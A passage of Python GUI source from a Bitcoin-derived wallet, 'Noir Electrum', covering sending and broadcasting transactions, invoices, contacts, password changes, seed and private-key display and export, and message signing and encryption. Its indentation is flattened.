'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Noir Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Noir Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Noir Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Noir address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Noir address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Noir Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("noir:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Noir Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Noir Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
